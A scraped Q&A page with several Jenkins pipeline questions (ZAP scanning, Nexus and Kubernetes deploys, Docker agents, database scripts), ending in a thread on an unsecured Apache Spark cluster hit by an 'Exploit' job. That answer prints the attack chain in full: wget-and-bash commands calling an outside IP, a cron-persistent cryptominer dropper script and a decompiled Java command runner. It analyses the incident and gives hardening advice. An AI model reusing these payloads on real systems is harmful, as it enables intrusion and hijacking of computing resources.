INFO org.zaproxy.addon.network.ExtensionNetwork - ZAP is now listening on 0.0.0.0:8090 - owasp

I have created a pipeline to use OWASP ZAP:
pipeline {
    agent any
    stages {
        stage('Execute Zap Jar') {
            steps {
                sh '''
                java -jar /home/pl/tools/com.cloudbees.jenkins.plugins.customtools.CustomTool/OwaspZap/ZAP_2.12.0/zap-2.12.0.jar -dir "/home/pl/.ZAP" -host 0.0.0.0 -port 8090 -daemon -config api.disablekey=true
                '''
            }
        }
        stage('Execute Zap CLI') {
            steps {
                sh '''
                export ZAP_URL=http://localhost && export ZAP_PORT=8090 && zap-cli status
                '''
            }
        }
        stage('Execute Zap Session and Zap Scan') {
            steps {
                sh '''
                zap-cli session new && zap-cli spider https://portail-re7-test.XXXXXX.com/ && zap-cli ajax-spider https://portail-re7-test.XXXXXX.com/ && zap-cli active-scan https://portail-re7-test.XXXXXX.com/ && zap session save default
                '''
            }
        }
        stage('Extract Zap Report') {
            steps {
                sh '''
                zap-cli report -o report-default.html -f html
                '''
            }
        }
    }
}
But it is getting stuck at:
7127 [ZAP-daemon] INFO org.zaproxy.addon.network.ExtensionNetwork - ZAP is now listening on 0.0.0.0:8090
Can someone please tell me what I am doing wrong?
Regards,
SAM

It looks like ZAP is acting as expected - it's been started and is listening on port 8090.
It has been started in daemon mode and so will stay running until you stop it.
FYI this is not one of the recommended ways to run ZAP - those are listed at https://www.zaproxy.org/docs/automate/
I'd recommend using the Automation Framework :)
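If you do want to keep the jar-based approach, the usual workaround for the blocked first stage is to background the daemon and wait for the API to come up before the next stage runs. A minimal sketch, assuming curl is available on the agent (the jar path and port are the ones from the question):
stage('Start Zap Daemon') {
    steps {
        sh '''
        # Start ZAP in the background so this sh step can return
        nohup java -jar /home/pl/tools/com.cloudbees.jenkins.plugins.customtools.CustomTool/OwaspZap/ZAP_2.12.0/zap-2.12.0.jar -dir "/home/pl/.ZAP" -host 0.0.0.0 -port 8090 -daemon -config api.disablekey=true > zap.log 2>&1 &
        # Poll until the ZAP API answers (give up after 60 seconds)
        for i in $(seq 1 60); do
            curl -s http://localhost:8090 > /dev/null && break
            sleep 1
        done
        '''
    }
}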

Related

Deploy docker image from Nexus registry

I have this Jenkinsfile which I want to use to build a pipeline:
pipeline {
    agent any
    environment {
        NEXUS_VERSION = "nexus3"
        NEXUS_PROTOCOL = "http"
        NEXUS_URL = "you-ip-addr-here:8081"
        NEXUS_REPOSITORY = "maven-nexus-repo"
        NEXUS_CREDENTIAL_ID = "nexus-user-credentials"
    }
    stages {
        stage('Download Helm Charts') {
            steps {
                sh "echo 'Downloading Helm Charts from Bitbucket repository...'"
                // configure credentials under http://192.168.1.28:8080/user/test/credentials/ and put credentials ID
                // not sure do I need to point the root folder of the Helm repository or only the single chart
                checkout scmGit(
                    branches: [[name: 'master']],
                    userRemoteConfigs: [[credentialsId: 'c2672602-dfd5-4158-977c-5009065c867e',
                                         url: 'http://192.168.1.30:7990/scm/jen/helm.git']])
            }
        }
        stage('Test Kubernetes version') {
            steps {
                sh "echo 'Checking Kubernetes version..'"
                // How to do remote test of kubernetes version
            }
        }
        stage('Push Helm Charts to Kubernetes') {
            steps {
                sh "echo 'building..'"
                // push here helm chart from Jenkins server to Kubernetes cluster
            }
        }
        stage('Build Image') {
            steps {
                sh "echo 'building..'"
                // configure credentials under http://192.168.1.28:8080/user/test/credentials/ and put credentials ID
                git credentialsId: 'bitbucket-server:50001e738fa6dafbbe7e336853ced1fcbc284fb18ea8cda8b54dbfa3a7bc87b9', url: 'http://192.168.1.30:7990/scm/jen/spring-boot-microservice.git', branch: 'master'
                // execute Java -jar ... and build docker image
                sh "./gradlew build && java -jar build/libs/gs-spring-boot-docker-0.1.0.jar"
                sh "docker build -t springio/gs-spring-boot-docker ."
            }
        }
        stage('Push Image into Nexus registry') {
            steps {
                sh "echo 'building..'"
                // push compiled docker image into Nexus repository
                script {
                    pom = readMavenPom file: "pom.xml";
                    filesByGlob = findFiles(glob: "target/*.${pom.packaging}");
                    echo "${filesByGlob[0].name} ${filesByGlob[0].path} ${filesByGlob[0].directory} ${filesByGlob[0].length} ${filesByGlob[0].lastModified}"
                    artifactPath = filesByGlob[0].path;
                    artifactExists = fileExists artifactPath;
                    if(artifactExists) {
                        echo "*** File: ${artifactPath}, group: ${pom.groupId}, packaging: ${pom.packaging}, version ${pom.version}";
                        nexusArtifactUploader(
                            nexusVersion: NEXUS_VERSION,
                            protocol: NEXUS_PROTOCOL,
                            nexusUrl: NEXUS_URL,
                            groupId: pom.groupId,
                            version: pom.version,
                            repository: NEXUS_REPOSITORY,
                            credentialsId: NEXUS_CREDENTIAL_ID,
                            artifacts: [
                                [artifactId: pom.artifactId,
                                 classifier: '',
                                 file: artifactPath,
                                 type: pom.packaging],
                                [artifactId: pom.artifactId,
                                 classifier: '',
                                 file: "pom.xml",
                                 type: "pom"]
                            ]
                        );
                    } else {
                        error "*** File: ${artifactPath}, could not be found";
                    }
                }
            }
        }
        stage('Deploy Image from Nexus registry into Kubernetes') {
            steps {
                sh "echo 'building..'"
            }
        }
        stage('Test'){
            steps {
                sh "echo 'Testing...'"
                // implement a check here is it deployed successfully
            }
        }
    }
}
How can I deploy the Docker image built by the Jenkins server and pushed to the Nexus repository? If possible, I want to use a service account with a token.
Instead of using 'nexusArtifactUploader', why don't you use docker push, like you do to build the image?
I guess nexusArtifactUploader uses the Nexus API and doesn't work with docker images, but you can access the registry using docker and the exposed port (defaults to 5000):
withCredentials([string(credentialsId: NEXUS_CREDENTIAL_ID, variable: 'registryToken')]) {
    sh 'docker login -u default -p "$registryToken" your-registry-url'
    sh 'docker push your-registry-url/image-name:image-tag'
}
You may also change the docker build command to build the image using your registry name (or tag it after building; see How to push a docker image to a private repository).
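As for the deploy stage itself, one common approach is to call kubectl with a service-account token stored in Jenkins. A minimal sketch, assuming a string credential 'k8s-sa-token' and a deployment named 'gs-spring-boot-docker'; the server and registry names are placeholders:
stage('Deploy Image from Nexus registry into Kubernetes') {
    steps {
        withCredentials([string(credentialsId: 'k8s-sa-token', variable: 'K8S_TOKEN')]) {
            // Point the running deployment at the image pushed to the registry
            // (pass --certificate-authority instead of skipping TLS verification if you have the CA)
            sh '''
            kubectl --server=https://your-k8s-api:6443 --token="$K8S_TOKEN" --insecure-skip-tls-verify \
                set image deployment/gs-spring-boot-docker \
                gs-spring-boot-docker=your-registry-url/image-name:image-tag
            '''
        }
    }
}
Note that the cluster also needs an imagePullSecret for the Nexus registry so the kubelet itself can pull the image.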

Jenkinsfile with Docker PowerShell image hangs

When the Docker PowerShell image is invoked from a Jenkinsfile, it keeps executing and the job never terminates.
pipeline {
    agent {
        docker {
            image 'mcr.microsoft.com/azure-powershell'
            args "--mount type=bind,src=/opt,dst=/opt -i -t --entrypoint=''"
        }
    }
    stages {
        stage('PwShell') {
            steps {
                powershell(returnStdout: true, script: 'Write-Output "PowerShell is mighty!"')
            }
        }
    }
}
As you have not provided any log details, it's tough to pinpoint why it is stuck. Generally, for a Jenkins declarative pipeline like the following -
pipeline {
    agent {
        docker { image '...abc.com' }
    }
    stages {
        stage('Test') {
            steps {
                sh 'node --version'
            }
        }
    }
}
When the Pipeline executes, Jenkins will automatically start the specified container and execute the defined steps within it:
[Pipeline] stage
[Pipeline] { (Test)
[Pipeline] sh
[guided-tour] Running shell script
+ node --version
v14.15.0
[Pipeline] }
[Pipeline] // stage
[Pipeline] }
And since you are stuck at the PowerShell line in the steps, it means the step is not set up correctly.
If you check the Microsoft PowerShell Support for Pipeline document, you will find that returnStdout returns the standard output stream (with a default encoding of UTF-8), and the Write-Output cmdlet writes to that output stream.
You should be able to solve your problem by changing your PowerShell step as shown in the snippet below.
steps {
    script {
        // returnStdout captures the output stream; trim the trailing newline
        def msg = powershell(returnStdout: true, script: 'Write-Output "PowerShell is mighty!"').trim()
        println msg
    }
}
Check the example section of the same document mentioned above for more detailed operations on the PowerShell steps.
I would also suggest reading the Using Docker with Pipeline document for more information.

Run my tests in a Docker Mongo instance using a Jenkins pipeline

I would like to run my tests against a Docker MongoDB instance using a Jenkins pipeline. I have got it working, kind of. My problem is that the tests run within the Mongo container; I just want it to start a container and have my tests connect to that Mongo container. At the moment it downloads Gradle within the container and takes about 5 minutes to run. I hope that makes sense. Here is my Jenkinsfile:
#!/usr/bin/env groovy
pipeline {
    environment {
        SPRING_PROFILES_ACTIVE = "jenkins"
    }
    agent {
        node {
            label "jdk8"
        }
    }
    parameters {
        choice(choices: 'None\nBuild\nMinor\nMajor', description: '', name: 'RELEASE_TYPE')
        string(defaultValue: "refs/heads/master:refs/remotes/origin/master", description: 'gerrit refspec e.g. refs/changes/45/12345/1', name: 'GERRIT_REFSPEC')
        choice(choices: 'master\nFETCH_HEAD', description: 'gerrit branch', name: 'GERRIT_BRANCH')
    }
    stages {
        stage("Test") {
            stages {
                stage("Initialise") {
                    steps {
                        println "Running on ${NODE_NAME}, release type: ${params.RELEASE_TYPE}"
                        println "gerrit refspec: ${params.GERRIT_REFSPEC}, branch: ${params.GERRIT_BRANCH}, event type: ${params.GERRIT_EVENT_TYPE}"
                        checkout scm
                        sh 'git log -n 1'
                    }
                }
                stage("Verify") {
                    agent {
                        dockerfile {
                            filename 'backend/Dockerfile'
                            args '-p 27017:27017'
                            label 'docker-pipeline'
                            dir './maintenance-notifications'
                        }
                    }
                    steps {
                        sh './gradlew :maintenance-notifications:backend:clean'
                        sh './gradlew :maintenance-notifications:backend:check :maintenance-notifications:backend:test'
                    }
                    post {
                        always {
                            junit 'maintenance-notifications/backend/build/test-results/**/*.xml'
                        }
                    }
                }
            }
        }
        stage("Release") {
            when {
                expression {
                    return params.RELEASE_TYPE != '' && params.RELEASE_TYPE != 'None';
                }
            }
            steps {
                script {
                    def gradleProps = readProperties file: "gradle.properties"
                    def isCurrentSnapshot = gradleProps.version.endsWith("-SNAPSHOT")
                    def newVersion = gradleProps.version.replace("-SNAPSHOT", "")
                    def cleanVersion = newVersion.tokenize(".").collect{it.toInteger()}
                    if (params.RELEASE_TYPE == 'Build') {
                        newVersion = "${cleanVersion[0]}.${cleanVersion[1]}.${isCurrentSnapshot ? cleanVersion[2] : cleanVersion[2] + 1}"
                    } else if (params.RELEASE_TYPE == 'Minor') {
                        newVersion = "${cleanVersion[0]}.${cleanVersion[1] + 1}.0"
                    } else if (params.RELEASE_TYPE == 'Major') {
                        newVersion = "${cleanVersion[0] + 1}.0.0"
                    }
                    def newVersionArray = newVersion.tokenize(".").collect{it.toInteger()}
                    def newSnapshot = "${newVersionArray[0]}.${newVersionArray[1]}.${newVersionArray[2] + 1}-SNAPSHOT"
                    println "release version: ${newVersion}, snapshot version: ${newSnapshot}"
                    sh "./gradlew :maintenance-notifications:backend:release -Prelease.useAutomaticVersion=true -Prelease.releaseVersion=${newVersion} -Prelease.newVersion=${newSnapshot}"
                }
            }
        }
    }
}
And here is my Dockerfile:
FROM centos:centos7
ENV container=docker
RUN mkdir -p /usr/java; curl http://configuration/yum/thecloud/artifacts/java/jdk-8u151-linux-x64.tar.gz|tar zxC /usr/java && ln -s /usr/java/jdk1.8.0_151/bin/j* /usr/bin
RUN mkdir -p /usr/mongodb; curl http://configuration/yum/thecloud/artifacts/mongodb/mongodb-linux-x86_64-3.4.10.tgz|tar zxC /usr/mongodb && ln -s /usr/mongodb/mongodb-linux-x86_64-3.4.10/bin/* /usr/bin
ENV JAVA_HOME /usr/java/jdk1.8.0_151/
ENV SPRING_PROFILES_ACTIVE jenkins
RUN yum -y install git.x86_64 && yum clean all
# Set up directory requirements
RUN mkdir -p /data/db /var/log/mongodb /var/run/mongodb
VOLUME ["/data/db", "/var/log/mongodb"]
# Expose port 27017 from the container to the host
EXPOSE 27017
CMD ["--port", "27017", "--pidfilepath", "/var/run/mongodb/mongod.pid"]
# Start mongodb
ENTRYPOINT /usr/bin/mongod
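What the question describes is the sidecar pattern from the Jenkins "Using Docker with Pipeline" document: run MongoDB in its own container and keep the Gradle build on the agent, so the Gradle distribution is cached between builds instead of being downloaded inside the Mongo container every time. A minimal sketch of a reworked Verify stage, assuming the Docker Pipeline plugin and a stock mongo image in place of the custom Dockerfile above:
stage("Verify") {
    steps {
        script {
            // Start Mongo as a throwaway sidecar container exposed on 27017;
            // it is stopped and removed automatically when the closure exits
            docker.image('mongo:3.4').withRun('-p 27017:27017') { c ->
                sh './gradlew :maintenance-notifications:backend:check :maintenance-notifications:backend:test'
            }
        }
    }
}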

How to execute a database script after deploying a Postgresql image to openshift with Jenkins?

I have a git repo with the Jenkins pipeline and the official PostgreSQL template:
kind: "BuildConfig"
apiVersion: "v1"
metadata:
  name: "postgresql-pipeline"
spec:
  strategy:
    jenkinsPipelineStrategy:
      jenkinsfile: |-
        pipeline {
          agent any
          environment {
            DATABASE_NAME = 'sampledb'
            DATABASE_USER = 'root'
            DATABASE_PASSWORD = 'root'
          }
          stages {
            stage('Clone git') {
              steps {
                git 'https://bitbucket.org/businnessdata_db/postgresql-test.git'
              }
            }
            stage('Deploy db') {
              steps {
                sh 'oc status'
                sh 'oc delete secret/postgresql'
                sh 'oc delete pvc/postgresql'
                sh 'oc delete all -l "app=postgresql-persistent"'
                sh 'oc new-app -f openshift/templates/postgresql-persistent.json'
              }
            }
            stage('Execute users script') {
              steps {
                sh 'oc status'
              }
            }
            stage('Execute update script') {
              steps {
                sh 'oc status'
              }
            }
          }
        }
    type: JenkinsPipeline
What do I have to put in the last two steps to run a script against the newly generated database?
You can either install psql on your Jenkins container and then run the script through a shell command:
sh """
export PGPASSWORD=<password>
psql -h <host> -d <database> -U <user_name> -p <port> -a -w -f <file>.sql
"""
Or, since Jenkinsfiles are written in Groovy, use Groovy to execute your statements. Here's the Groovy documentation for working with databases.
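For the Groovy route, a minimal sketch using groovy.sql.Sql, assuming the PostgreSQL JDBC driver is available on the Jenkins classpath, script security permits it, and that the service hostname and script filename (placeholders here) match your template:
import groovy.sql.Sql

// Connect with the credentials from the pipeline's environment block
def db = Sql.newInstance(
    'jdbc:postgresql://postgresql:5432/sampledb',
    'root', 'root', 'org.postgresql.Driver')
db.execute(new File('users-script.sql').text)  // run the checked-out SQL script
db.close()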

apache spark executor submit driver with exploit class

After a lot of searching and research, I have turned here for help.
The problem is that once a Spark cluster is built (one master and 4 workers with different IP addresses), each executor will constantly submit a "driver". From the web UI, I can see a class named "Exploit" submitted with the "driver".
The following is the head and tail of the log file of one worker.
Launch Command: "/usr/lib/jvm/jdk1.8/jre/bin/java" "-cp" "/home/labuser/spark/conf/:/home/labuser/spark/jars/*" "-Xmx1024M" "-Dspark.eventLog.enabled=true" "-Dspark.driver.supervise=false" "-Dspark.submit.deployMode=cluster" "-Dspark.app.name=Exploit" "-Dspark.jars=http://192.99.142.226:8220/Exploit.jar" "-Dspark.master=spark://129.10.58.200:7077" "org.apache.spark.deploy.worker.DriverWrapper" "spark://Worker@129.10.58.202:44717" "/home/labuser/spark/work/driver-20180815111311-0065/Exploit.jar" "Exploit" "wget -O /var/tmp/a.sh http://192.99.142.248:8220/cron5.sh,bash /var/tmp/a.sh"
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.allocator.type: unpooled
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.threadLocalDirectBufferSize: 65536
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.maxThreadLocalCharBufferSize: 16384
18/08/15 11:13:56 DEBUG NetUtil: Loopback interface: lo (lo, 0:0:0:0:0:0:0:1%lo)
18/08/15 11:13:56 DEBUG NetUtil: /proc/sys/net/core/somaxconn: 128
18/08/15 11:13:57 DEBUG TransportServer: Shuffle server started on port: 46034
18/08/15 11:13:57 INFO Utils: Successfully started service 'Driver' on port 46034.
18/08/15 11:13:57 INFO WorkerWatcher: Connecting to worker spark://Worker@129.10.58.202:44717
18/08/15 11:13:58 DEBUG TransportClientFactory: Creating new connection to /129.10.58.202:44717
18/08/15 11:13:59 DEBUG AbstractByteBuf: -Dio.netty.buffer.bytebuf.checkAccessible: true
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.level: simple
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.maxRecords: 4
18/08/15 11:13:59 DEBUG ResourceLeakDetectorFactory: Loaded default ResourceLeakDetector: io.netty.util.ResourceLeakDetector@350d33b5
18/08/15 11:14:00 DEBUG TransportClientFactory: Connection to /129.10.58.202:44717 successful, running bootstraps...
18/08/15 11:14:00 INFO TransportClientFactory: Successfully created connection to /129.10.58.202:44717 after 1706 ms (0 ms spent in bootstraps)
18/08/15 11:14:00 INFO WorkerWatcher: Successfully connected to spark://Worker@129.10.58.202:44717
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxCapacity.default: 32768
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxSharedCapacityFactor: 2
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.linkCapacity: 16
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.ratio: 8
I found there is an "Exploit" class which hacks Spark clusters by taking advantage of the fact that anyone can submit applications to an unsecured Spark cluster.
ARBITRARY CODE EXECUTION IN UNSECURED APACHE SPARK CLUSTER
But I don't think my cluster is hacked, because this problem still exists even after enabling authentication.
My question is: has anyone else had this problem? And why would this happen?
THIS IS VERY ALARMING!
Firstly, the decompiled source code shows that the driver will execute commands supplied to it via arguments. In your case, it runs wget to download a script to /var/tmp, then executes it.
The downloaded script fetches a jpg and pipes it to bash. THIS IS NOT AN IMAGE:
wget -q -O - http://192.99.142.248:8220/logo10.jpg | bash -sh
logo10.jpg installs a cron job that pulls down even more code to run on your cluster. You are probably seeing the job being submitted repeatedly because the scheduled job keeps relaunching it.
#!/bin/sh
ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w sustes |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
wget -O /var/tmp/config.json http://192.99.142.248:8220/3.json
wget -O /var/tmp/sustes http://192.99.142.248:8220/rig
chmod 777 /var/tmp/sustes
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sustes -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
Decompiled Source
import java.io.BufferedReader;
import java.io.InputStreamReader;

// Decompiled payload: splits its first argument on commas and runs each
// piece as an OS command, printing the output.
public class Exploit {
    public Exploit() {
    }

    public static void main(String[] var0) throws Exception {
        String[] var1 = var0[0].split(",");
        String[] var2 = var1;
        int var3 = var1.length;

        for(int var4 = 0; var4 < var3; ++var4) {
            String var5 = var2[var4];
            System.out.println(var5);
            System.out.println(executeCommand(var5.trim()));
            System.out.println("==============================================");
        }
    }

    private static String executeCommand(String var0) {
        StringBuilder var1 = new StringBuilder();

        try {
            Process var2 = Runtime.getRuntime().exec(var0);
            var2.waitFor();
            BufferedReader var3 = new BufferedReader(new InputStreamReader(var2.getInputStream()));

            String var4;
            while((var4 = var3.readLine()) != null) {
                var1.append(var4).append("\n");
            }
        } catch (Exception var5) {
            var5.printStackTrace();
        }

        return var1.toString();
    }
}
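As for why enabling authentication did not stop the submissions: a shared secret (spark.authenticate) has not always been enough for standalone clusters exposed to the internet - notably, the standalone REST submission gateway on port 6066 was a known bypass - so the standard advice is network-level isolation of the master's ports on top of authentication. A sketch of both hardening steps, with the subnet as a placeholder:
# spark-defaults.conf -- require a shared secret between Spark components
#   spark.authenticate        true
#   spark.authenticate.secret <your-secret>

# Block the master's submission ports (7077 legacy, 6066 REST) and the
# web UI (8080) from everything except your own network
iptables -A INPUT -p tcp --dport 7077 ! -s 10.0.0.0/8 -j DROP
iptables -A INPUT -p tcp --dport 6066 ! -s 10.0.0.0/8 -j DROP
iptables -A INPUT -p tcp --dport 8080 ! -s 10.0.0.0/8 -j DROP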